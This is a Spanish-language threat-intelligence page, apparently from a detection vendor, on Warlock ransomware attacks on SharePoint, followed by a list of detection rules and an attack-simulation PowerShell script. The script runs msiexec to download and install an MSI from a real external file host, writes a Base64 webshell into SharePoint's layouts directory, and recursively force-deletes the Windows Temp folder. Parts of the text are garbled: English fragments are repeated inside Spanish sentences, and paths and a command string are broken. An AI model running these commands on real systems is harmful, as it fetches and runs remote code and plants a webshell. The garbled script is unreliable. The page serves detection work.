SOC Prime Bias: Critical

05 Oct 2026 17:09 UTC

Ataques de Ransomware Warlock a Infraestructura Crítica de Agua y Telecomunicaciones

Author Photo
SOC Prime Team linkedin icon Seguir
Ataques de Ransomware Warlock a Infraestructura Crítica de Agua y Telecomunicaciones
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Un actor de amenaza con nexos en China, rastreado como Longlegs, está desplegando ransomware Warlock mediante la explotación de vulnerabilidades de Microsoft SharePoint. El grupo utiliza una cadena de explotación ToolShell para el acceso inicial antes de moverse lateralmente a través de las redes comprometidas. Los atacantes también aplican técnicas avanzadas de evasión, incluyendo el abuso de controladores vulnerables para deshabilitar software de seguridad y el aprovechamiento de servicios en la nube legítimos para la entrega de cargas útiles.

Investigación

La investigación rastreó la actividad desde la explotación inicial de SharePoint hasta el despliegue de un webshell dentro del directorio LAYOUTS. Los analistas observaron el uso de claves de máquina ASP.NET forjadas para la ejecución remota de código y el ransomware preparado en el recurso compartido SYSVOL para la distribución a nivel de dominio. La cadena de ataque también involucró la carga lateral de DLL y el abuso de la funcionalidad de tunelización de Visual Studio Code para el acceso persistente.

Mitigación

Las organizaciones deben priorizar el parcheo del servidor Microsoft SharePoint para remediar las vulnerabilidades de ToolShell conocidas. La aplicación de controles estrictos sobre controladores firmados pero vulnerables puede ayudar a prevenir ataques BYOVD. Los equipos de seguridad también deben monitorear el uso anómalo de herramientas residuales y restringir el acceso al recurso compartido SYSVOL para actividades no administrativas para reducir el movimiento lateral y el despliegue de ransomware.

Respuesta

Cuando se detecta actividad maliciosa, los respondedores de incidentes deben aislar los servidores SharePoint afectados e inspeccionar el recurso compartido SYSVOL en busca de scripts o binarios no autorizados. Realizar una auditoría exhaustiva de las cuentas de dominio, enfocándose en adiciones no autorizadas al grupo de Administradores locales. Revisar el tráfico de red en busca de conexiones salientes a servicios de intercambio de archivos como catbox.moe o wasabisys.com utilizados para preparar cargas útiles.

Flujo de Ataque

Detecciones

Agregar Usuario a Administradores Locales (a través de línea de comandos)

Equipo de SOC Prime
05 Oct 2026

Descarga o Carga vía Powershell (a través de línea de comandos)

Equipo de SOC Prime
05 Oct 2026

Cadenas de Powershell Sospechosas (a través de línea de comandos)

Equipo de SOC Prime
05 Oct 2026

Llamar Clases/Métodos .NET Sospechosos desde la Línea de Comandos de Powershell (a través de creación de procesos)

Equipo de SOC Prime
05 Oct 2026

Posible Descubrimiento de Recursos Compartidos de Red (a través de línea de comandos)

Equipo de SOC Prime
05 Oct 2026

Descubrimiento de Confianzas de Dominio Sospechosas (a través de línea de comandos)

Equipo de SOC Prime
05 Oct 2026

Posible Intento de Instalación de Archivo MSI Remoto (a través de línea de comandos)

Equipo de SOC Prime
05 Oct 2026

Ejecución Sospechosa desde Perfil de Usuario Público (a través de creación de procesos)

Equipo de SOC Prime
05 Oct 2026

Cadenas de Powershell Sospechosas (a través de powershell)

Equipo de SOC Prime
05 Oct 2026

Llamar Métodos .NET Sospechosos desde Powershell (a través de powershell)

Equipo de SOC Prime
05 Oct 2026

Posible Creación de Webshell en Directorios de Microsoft Exchange / SharePoint (a través de evento de archivo)

Equipo de SOC Prime
05 Oct 2026

Archivos Sospechosos en Perfil de Usuario Público (a través de evento de archivo)

Equipo de SOC Prime
05 Oct 2026

Posible Infiltración / Exfiltración de Datos / C2 vía Servicios / Herramientas de Terceros (a través de proxy)

Equipo de SOC Prime
05 Oct 2026

Posible Infiltración / Exfiltración de Datos / C2 vía Servicios / Herramientas de Terceros (a través de dns)

Equipo de SOC Prime
05 Oct 2026

Comando y Control Sospechoso por Solicitud a Dominio de Interacciones Out-of-Band (a través de dns)

Equipo de SOC Prime
05 Oct 2026

IOCs (HashSha256) para detectar: Atacantes de Ransomware Warlock Afectan a Operadores de Agua y Telecomunicaciones

Reglas de IA de SOC Prime
05 Oct 2026

Detección de Comando Malicioso de PowerShell para Ejecución de Código [Windows Powershell]

Reglas de IA de SOC Prime
05 Oct 2026

Etapa y Ejecución de Ransomware Warlock vía Recursos Compartidos de Red [Evento de Archivo de Windows]

Reglas de IA de SOC Prime
05 Oct 2026

Indicadores de Ransomware Warlock en Servidores SharePoint [Creación de Procesos de Windows]

Reglas de IA de SOC Prime
05 Oct 2026

Ejecución de Simulación

Requisito previo: La Verificación Previa de Telemetría y Línea Base debe haber pasado.

Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y buscar generar exactamente la telemetría esperada por la lógica de detección. Los ejemplos abstractos o no relacionados llevarán a un diagnóstico incorrecto.

  • Narrativa & Comandos de Ataque: El adversario pretende desplegar ransomware Warlock en un servidor SharePoint. El ataque comienza usando msiexec para extraer un MSI malicioso de un dominio controlado por el atacante (catbox.moe). Después de la incursión inicial, el atacante usa PowerShell para escribir un web shell ASPX malicioso en el camino de layout2sp.aspx de SharePoint usando una carga útil codificada en Base64 para evitar filtros de cadena simples. Finalmente, el atacante intenta cargar un ensamblado .NET malicioso directamente en la memoria usando path using a Base64 encoded payload to bypass simple string filters. Finally, the attacker attempts to load a malicious .NET assembly directly into memory using System.Workflow.ComponentModel para ejecutar código sin dejar huellas en el disco.

  • Script de Prueba de Regresión:

    # Guion de Simulación de Ransomware Warlock
    # NOTA: Este script es solo para propósitos de prueba autorizados.
    
    Write-Host "[!] Iniciando Simulación de Ransomware Warlock..." -ForegroundColor Red
    
    # 1. Simular Descarga Remota de MSIEXEC (Selección 3)
    Write-Host "[*] Simulando descarga remota de carga útil MSIEXEC..."
    Start-Process "msiexec.exe" -ArgumentList "/q /i ""https://litter.catbox.moe/6f5tdt.msi""" -ErrorAction SilentlyContinue
    
    # 2. Simular Descarga de Web Shell ASPX vía PowerShell (Selección 1)
    # Usamos la cadena exacta de la regla para asegurar la detección
    Write-Host "[*] Simulando la descarga de web shell vía Base64..."
    $cmd1 = "powershell -nop -c ""[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMONmicrosoft sharedweb server extensions14templatelayoutslayout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))"""
    Invoke-Expression $cmd1
    
    # 3. Simular Carga Refleja de Ensamblados (Selección 2)
    Write-Host "[*] Simulando Carga Refleja de Ensamblado..."
    $cmd2 = "cmd.exe /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel"
    Invoke-Expression $cmd2
    
    Write-Host "[+] Comandos de simulación enviados." -ForegroundColor Green
  • Comandos de Limpieza:

    # Script de limpieza para remover cualquier artefacto creado durante la simulación
    Write-Host "[!] Limpiando artefactos de la simulación..." -ForegroundColor Yellow
    
    # Eliminar archivos simulados (Nota: En una prueba real, apuntarías a las rutas específicas creadas)
    # Dado que usamos cadenas básicas, principalmente aseguramos que no se hayan generado archivos maliciosos reales.
    Remove-Item -Path "C:WindowsTemp*" -Recurse -Force -ErrorAction SilentlyContinue
    
    Write-Host "[+] Limpieza completa." -ForegroundColor Green